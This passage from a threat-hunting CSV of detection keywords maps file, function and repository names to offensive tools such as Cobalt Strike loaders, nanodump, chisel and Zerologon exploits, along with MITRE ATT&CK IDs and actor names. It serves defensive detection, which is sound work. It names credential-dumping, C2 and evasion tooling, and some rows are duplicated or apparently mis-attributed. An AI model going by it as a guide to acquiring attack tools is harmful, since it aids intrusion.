T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*ch0sys/DUBrute*",".{0,1000}ch0sys\/DUBrute.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","1","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" "*CH3CK70K3N(*",".{0,1000}CH3CK70K3N\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Chachi-Enumerator.ps1*",".{0,1000}Chachi\-Enumerator\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Chachi-Enumerator.ps1*",".{0,1000}Chachi\-Enumerator\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*ChaitanyaHaritash/kimi*",".{0,1000}ChaitanyaHaritash\/kimi.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*chameleon.py *",".{0,1000}chameleon\.py\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*change_sandbox_evasion_method(*",".{0,1000}change_sandbox_evasion_method\(.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*change_sandbox_evasion_method(*",".{0,1000}change_sandbox_evasion_method\(.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*change_shellcode_exec_method(*",".{0,1000}change_shellcode_exec_method\(.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*changepasswd.py*",".{0,1000}changepasswd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*change-windows10-mac-address.py*",".{0,1000}change\-windows10\-mac\-address\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*chaos*persistence_enable*",".{0,1000}chaos.{0,1000}persistence_enable.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*charlesnathansmith/whatlicense*",".{0,1000}charlesnathansmith\/whatlicense.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*charles-proxy*",".{0,1000}charles\-proxy.{0,1000}","offensive_tool_keyword","charles-proxy","A cross-platform GUI web debugging proxy to view intercepted HTTP and HTTPS/SSL live traffic","T1043.002 - T1556.001 - T1573.001","TA0012 - TA0017","N/A","N/A","Sniffing & Spoofing","https://charlesproxy.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*charlotte-main.zip*",".{0,1000}charlotte\-main\.zip.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*ChatLadon.exe*",".{0,1000}ChatLadon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*ChatLadon.rar*",".{0,1000}ChatLadon\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*chaudharyarjun/LooneyPwner*",".{0,1000}chaudharyarjun\/LooneyPwner.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/chaudharyarjun/LooneyPwner","1","1","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "*check that our dll as been injected : NTHASH*",".{0,1000}check\sthat\sour\sdll\sas\sbeen\sinjected\s\:\sNTHASH.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*check_all*.c*",".{0,1000}check_all.{0,1000}\.c.{0,1000}","offensive_tool_keyword","CheckPlease","c project from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","883","157","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" "*check_all*.go*",".{0,1000}check_all.{0,1000}\.go.{0,1000}","offensive_tool_keyword","CheckPlease","go script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","883","157","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" "*check_all*.pl*",".{0,1000}check_all.{0,1000}\.pl.{0,1000}","offensive_tool_keyword","CheckPlease","perl script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","883","157","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" "*check_all*.ps1*",".{0,1000}check_all.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","CheckPlease","ps1 script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","1","N/A","N/A","9","883","157","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" "*check_all*.py*",".{0,1000}check_all.{0,1000}\.py.{0,1000}","offensive_tool_keyword","CheckPlease","python script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","1","N/A","N/A","9","883","157","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" "*check_and_write_IAT_Hook*",".{0,1000}check_and_write_IAT_Hook.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*check_cve-2020-1472.py*",".{0,1000}check_cve\-2020\-1472\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1072","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WiIs0n/Zerologon_CVE-2020-1472","1","1","N/A","N/A","1","11","5","2020-10-05T07:47:02Z","2020-09-29T18:45:44Z" "*check_function ntdll.dll EtwEventWrite*",".{0,1000}check_function\sntdll\.dll\sEtwEventWrite.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*check_ppl_requirements*",".{0,1000}check_ppl_requirements.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*check_sudo_nopasswd_binaries(*",".{0,1000}check_sudo_nopasswd_binaries\(.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*checkIfHiddenAPICall*",".{0,1000}checkIfHiddenAPICall.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*Check-LocalAdminHash.ps1*",".{0,1000}Check\-LocalAdminHash\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*CheckPlease*",".{0,1000}CheckPlease.{0,1000}","offensive_tool_keyword","CheckPlease","This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads.","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","883","157","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" "*CheckPort.csproj*",".{0,1000}CheckPort\.csproj.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*CheeseDCOM.exe*",".{0,1000}CheeseDCOM\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheeseExec.csproj*",".{0,1000}CheeseExec\.csproj.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheeseExec.exe*",".{0,1000}CheeseExec\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheesePS.csproj*",".{0,1000}CheesePS\.csproj.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheesePS.exe*",".{0,1000}CheesePS\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheeseRDP.exe*",".{0,1000}CheeseRDP\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheeseSQL.exe*",".{0,1000}CheeseSQL\.exe.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheeseTools.sln*",".{0,1000}CheeseTools\.sln.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheeseTools-master*",".{0,1000}CheeseTools\-master.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*cheetah.py -*",".{0,1000}cheetah\.py\s\-.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*chenjiandongx/sniffer*",".{0,1000}chenjiandongx\/sniffer.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","8","709","63","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z" "*Chimera-main.zip*",".{0,1000}Chimera\-main\.zip.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*Chimera-master.zip*",".{0,1000}Chimera\-master\.zip.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*chisel -*",".{0,1000}chisel\s\-.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel client -*",".{0,1000}chisel\sclient\s\-.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel client http*",".{0,1000}chisel\sclient\shttp.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel server -*",".{0,1000}chisel\sserver\s\-.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel.exe *",".{0,1000}chisel\.exe\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*chisel.exe client*",".{0,1000}chisel\.exe\sclient.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel.exe server*",".{0,1000}chisel\.exe\sserver.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel.jpillora.com*",".{0,1000}chisel\.jpillora\.com.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel_1*_darwin_*.gz*",".{0,1000}chisel_1.{0,1000}_darwin_.{0,1000}\.gz.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel_1*_linux_*.gz*",".{0,1000}chisel_1.{0,1000}_linux_.{0,1000}\.gz.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 